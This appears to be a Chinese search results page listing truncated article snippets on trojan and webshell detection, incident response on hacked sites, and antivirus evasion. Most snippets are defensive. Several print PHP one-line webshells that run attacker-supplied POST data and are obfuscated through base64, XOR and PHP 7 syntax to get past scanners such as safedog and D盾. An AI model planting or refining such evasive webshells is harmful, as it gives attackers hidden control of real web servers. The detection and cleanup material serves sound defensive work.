首页
学习
活动
专区
圈层
工具
发布

aipy实战:建设PE文件查杀神器,阻止Windows EXE木马!

API 组合(像注册表篡改、网络通信链)(4)解析 PE 头(看编译环境、系统兼容性、加壳痕迹)二、过程实战测了个可疑文件,刚用工具跑了 nimplant.exe,结果吓一跳:提示词:帮我写一个小型的木马静态特征查杀工具...,用于检测windows下的exe可执行文件是否是可疑的木马。...检测这个文件是不是恶意的木马。把写好的软件保存在项目文件夹下。任务执行了,它能扫描文件静态字符串,那些藏在文件里的恶意特征,被 Aipy 一下子揪出来!...对于程序动态连接函数,Aipy 也能仔细排查出结果啦:扫出 426 个可疑字符串,含键盘记录、勒索关键词熵值超高(.rdata 节区 6.94),明显加密痕迹检测到注册表篡改 + 网络通信 API 组合,妥妥的木马行为结论...三、优势轻量:Python 脚本直接跑,不挑环境✨灵活:特征库可自定义,适合二次开发实用:样本初筛、应急响应都能用这次打造的PE文件查杀工具初战告捷,成功识别出恶意木马的多种特征,堪称静态分析的“小钢炮

39310
  • 您找到你想要的搜索结果了吗?
    是的
    没有找到

    利用php新特性过静态查杀

    原因是突然想到既然php7.1不能利用可变函数的assert,那就利用php7的新特性来绕过查杀正则,最终绕过某盾和“某d0g”。 实验环境在7.1.9,所有马儿在php7以下的环境均不能使用。...如果未更新此特性的查杀软件,就会不认识此函数,导致被绕过。 例如: php function b():string{ return $_POST['h3art3ars']; } eval(b()); ?> 可以用查杀软件测试一下。 ? 发现没有被检测到。 ?...`符号,查杀软件不会理解着个处理过程 ,可能就会导致绕过。 就像以下代码就可以绕过某d0g php $a=$b??$_POST['h3art3ars']; eval($a); ?...而且不止自定义函数,还可以配合类,可变变量等,来绕过静态查杀。 还可以利用 `太空船操作符(组合比较符)`,`整数除法函数 intdiv()`等来绕过动态查杀。 这里给D哥的规则库又能添加几条了。

    1.3K20

    网站被跳转到恶意博彩网的木马查杀过程

    通过服务器的SINESAFE木马查杀工具,查杀出多个变形的webshell,以及隐藏属性无法删除的木马文件,本地扫描两个上传文件,火绒均报毒。 我这才明白过来,原来是我网站被黑了。...赶紧打开服务器里的各个站点,下载网站程序代码到本地,然后挨个对每一个代码进行查看,查看是不是网站被黑客植入了木马后门,果不其然在每个网站根目录里的conn.php发现了黑客插入的恶意代码: functiongo_bots_url...=-1){init_flag="apk"; 去除掉恶意代码后,网站从百度搜索点击进来的也正常显示了,真是太无耻了,在服务器中查看隐藏属性的文件普通肉眼是看不到的,需要用专门的SINESAFE木马查杀工具才能看到

    1.8K20

    利用驱动人生升级通道传播的木马手工查杀记

    一、 背景介绍 驱动人生木马在1月24日的基础上再次更新,将攻击组件安装为计划任务、服务并启动。本次手工查杀主要针对该木马。...相关文章:https://www.freebuf.com/column/195250.html 最近在应急过程中,某单位电脑感染了更新后的驱动人生木马,由于客观原因,不能安装杀毒软件进行查杀,便进行手工杀毒...,整个过程真心感觉该病毒具有“春风吹又生”的特质,于是将查杀过程记录下来,希望能给小伙伴们带来帮助。...运行处的内容为: C:\WINDOWS\system32\cmd.exe/c C:\WINDOWS\system32\wmiex.exe 根据介绍该木马病毒的技术文章,Wmiex.exe为异常应用程序。...三、 总结 本次手工查杀病毒过程如下: 1、使用TCPView查看异常外连行为对应的PID. 2、在Process Exploer中,找到PID对应的进程程序所在位置并关闭该进程。

    2.6K10

    php图片木马实现原理

    什么是木马 木马病毒是指隐藏在正常程序中的一段具有特殊功能的恶意代码,是具备破坏和删除文件、发送密码、记录键盘和攻击Dos等特殊功能的后门程序。 那,php的木马是长什么样的呢?...,讲到的是图片木马上传,那么该怎么制作图片木马呢?.../a/1.php'),FILE_APPEND);//1.php是一个木马文件 直接通过txt形式打开,可看到新增的数据 ? 将1.jpg图片直接打开,可发现文件没有损坏: ?...通过上传文件,发现php识别的也是jpeg: ? ' php解析木马原理 大家看以下代码,忽略php实现的东西,只看结构: 木马写法,可以看 https://github.com/tioncico/webshell/tree/master/php 另外提一嘴,既然是可以执行php文件了,完全可以在图片文件中,include

    7.4K20

    一个Linux平台的门罗币挖矿木马的查杀与分析

    通过分析,定性为是一起针对“门罗币”的挖矿木马入侵事件。本文记录处理该事件的关键过程以及对该挖矿木马核心代码进行的分析,方便做事件响应的同行们碰到同家族类型木马后可以快速查杀,定性威胁事件。...0x01 木马行为与查杀过程 主要行为 木马以r88.sh作为downloader首先控制服务器,通过判断当前账户的权限是否为root来进行下一步的操作,若为root则在目录/var/spool/cron...木马查杀 1)尝试杀掉bashd与bashe进程以及root.sh/rootv2.sh/lower.sh/lowerv2.sh与r88.sh这些shell进程 2)清除掉/tmp目录下木马释放的文件:/...tmp/config.json等 3)清除3个位置的定时任务:/var/spool/cron/root、/var/spool/cron/crontabs/root以及/etc/cron.d 对应的自动查杀脚本如下...该项目在:https://github.com/xmrig/xmrig 0x03 总结 该挖矿木马并没有使用很多高级的防查杀技术,也没有广泛传播的蠕虫属性,仅仅使用定时任务来实现简单的进程保护,通过无差别攻击进行

    3K40

    免杀攻防之Webshell免杀研究

    它具有实时木马程序查杀、网站挂马拦截、文件篡改保护、PHP拒绝服务攻击防御、SQL防御、XSS跨站攻击防御、入侵拦截防护、远程桌面安全保护等特性。...查杀技术 目前主流的木马查杀方法有:静态检查、动态检测、日志检查三种方式。...免杀技巧 木马程序可以使用多种编程语言来设计,不同的编程语言有不同特性以及提供的系统函数,所以在实现免杀时可以首先考虑灵活运用语言的特性来实现免杀,其次可以根据查杀软件的查杀规则来重构木马程序,躲避木马查杀工具的查杀...encode.php对上面的大马程序进行一次base64加密处理,encode.php代码如下: 之后我们在浏览器中访问encode.php即可实现对shell.php大马程序的加密处理: PS:因为木马程序源代码中含有很多敏感的操作...之后使用安全狗查杀————成功免杀 之后使用护卫神进行查杀————成功免杀 至此,安全狗、护卫神、D盾成功免杀,之后我们试试可用性: 可以正常使用~ 可变变量 可变变量是PHP中一种较为独特的变量,它可以动态的改变一个变量的名称

    2.7K10

    php免杀webshell木马总结

    php $a=eval;$a() ?...> 用类把函数包裹,D盾对类查杀较弱 0x09 编码绕过 用php的编码函数,或者用异或等等 简单的base64_decode,其中因为他的正则匹配可以加入一些下划线干扰杀软 php $a = base64_decode("YXNz+ZX____J____0"); $a($_POST[x]); ?> 或 php $a= ("!"^"@").'...> 0x10 PHP7.1后webshell何去何从 在php7.1后面我们已经不能使用强大的assert函数了用eval将更加注重特殊的调用方法和一些字符干扰,后期大家可能更加倾向使用大马 总结 对于安全狗杀形...对于关键词的后传入对免杀安全狗,d盾,河马 等等都是不错的,后期对于菜刀的轮子,也要走向高度的自定义化 用户可以对传出的post数据进行自定义脚本加密,再由webshell进行解密获取参数,那么以现在的软waf查杀能力几乎为

    3K40

    php 一句话木马检测绕过研究

    客户端将 PHP 代码使用特殊参数名(密码),发送给放置在服务端上的一句话木马文件; 一句话木马脚本则在服务器上执行发来的 PHP 代码,然后将执行结果回传给客户端,客户端将结果解析并展示给操作者。...0x02:查杀现状研究 根据 0x01 的一句话木马原理,我们知道必须要在服务器上执行客户端发来的字符串形式的 PHP 代码。...2、利用检测平台的信息缺失 接着猜想:当脚本在沙盒中运行时,如果得不到可以让脚本正常执行的关键信息,平台就无法查杀 Webshell;而我们连接时,带上关键信息,就可以正常使用一句话木马后门,从而绕过查杀...0x07: 彩蛋 最后再给出一个可以绕过当前市面上几乎所有 Webshell 查杀的 PHP 一句话木马脚本。...,但是经过研究,还是可以构造出绕过查杀的 PHP 一句话木马脚本。

    6K00

    最新网站被挂马被跳转解决办法

    网站木马路径 分析得出网站中被植入了一些PHP网页木马,大量的生成调用动态的垃圾页面。接下来,连接FTP进行删除清理操作。...2,通过FTP目录排查恶意网马 通过FTP工具登录到网站的FTP根目录,分析查找到这些植入的PHP文档(一般情况下很容易分析出)或者请网站的技术人员帮助分析查找。 如图: ?...网站被挂马的webshell文件 可以看到这些PHP文档就是恶意网页生成的元凶。全部进行删除,并且把FTP里面的全检查一遍,彻底清除恶意代码。...再详细检查下其他目录的修改时间以及可疑文件,如果不确定木马的话 建议找专业做安全的Sine安全来处理。 3,全站查杀网站木马清除木马后门 为了彻底清除被植入的恶意网马,建议把网站源码打包进行病毒查杀。...用sinesafe木马检测工具进行全站的查杀与扫描。

    3.8K20

    【蓝队福利】D-eyes木马查杀与微步的一次巧妙结合

    基本介绍 D-Eyes是绿盟科技的一款检测与响应工具,具备勒索挖矿病毒及Webshell等恶意样本排查检测,辅助安全工程师应急响应时排查入侵痕迹,定位恶意样本,而在使用过程中我们可以将它与微步的查杀规则进行结合...,相当于将微步搬移到本地进行查杀操作,这对于需要隔离进行排查的场景来说非常非常有帮助 工具安装 项目地址:https://github.com/m-sec-org/d-eyes 扫描规则库:https:...通过执行以下命令获取计划任务信息: D-Eyes.exe task 自启动类 通过执行以下命令扫描检测自启动项: D-Eyes.exe autoruns 文末小结 本篇文章我们主要介绍了如何通过使用D-eyes进行木马查杀

    61710

    最新网站被挂马被跳转解决办法

    如图: 网站被挂马收录的一些页面快照 点击几条收录均为这些动态的URL路径 网站木马路径 分析得出网站中被植入了一些PHP网页木马,大量的生成调用动态的垃圾页面。...2,通过FTP目录排查恶意网马 通过FTP工具登录到网站的FTP根目录,分析查找到这些植入的PHP文档(一般情况下很容易分析出)或者请网站的技术人员帮助分析查找。...如图: 网站被挂马的webshell文件 可以看到这些PHP文档就是恶意网页生成的元凶。全部进行删除,并且把FTP里面的全检查一遍,彻底清除恶意代码。...再详细检查下其他目录的修改时间以及可疑文件,如果不确定木马的话 建议找专业做安全的Sine安全来处理。 3,全站查杀网站木马清除木马后门 为了彻底清除被植入的恶意网马,建议把网站源码打包进行病毒查杀。...用sinesafe木马检测工具进行全站的查杀与扫描。 无门槛领取总价值高达2860元代金券 云服务器3折活动 腾讯云服务器自行选配

    4.1K10

    应急靶场(12):【玄机】Linux入侵排查

    一、web目录存在木马,请找到木马的密码提交 猜测/var/www/html是web目录,进入后看到1.php这种正常网站不会命名的文件,查看后发现是webshell木马。...目前Linux没有好用的webshell木马查杀工具,此时可将web目录文件下载到Windows中,用D盾进行查杀。...flag{1} 二、服务器疑似存在不死马,请找到不死马的密码提交 在web目录/var/www/html中,看到.shell.php这种命名可疑的文件,查看后发现是不死马webshell。...flag{index.php} 四、黑客留下了木马文件,请找出黑客的服务器ip提交 在web目录/var/www/html中,看到shell(1).elf这种命名可疑的文件,赋予执行权限后执行,发现外联...IP地址10.11.55.21的3333端口,判断是后门木马。

    78110
    领券